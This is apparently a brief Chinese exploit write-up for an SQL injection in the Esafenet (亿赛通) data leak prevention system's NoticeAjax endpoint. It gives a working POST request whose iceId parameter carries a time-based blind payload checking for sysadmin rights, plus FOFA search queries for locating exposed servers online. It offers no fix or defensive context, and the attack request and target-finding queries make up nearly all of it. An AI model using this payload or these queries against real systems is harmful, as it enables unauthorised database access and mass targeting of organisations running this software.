亿赛通数据泄露防护(DLP)系统
亿赛通数据泄露防护(DLP)系统NoticeAjax SQL注入漏洞
应用界面如下所示:
漏洞POC如下所示:
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host: x.x.x.x.
Content-Length: 96
command=delNotice&iceId=123';+if+(select+IS_SRVROLEMEMBER('sysadmin'))=1+WAITFOR+DELAY+'0:0:5'--
FOFA语法:
body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp" || body="/CDGServer3/index.jsp"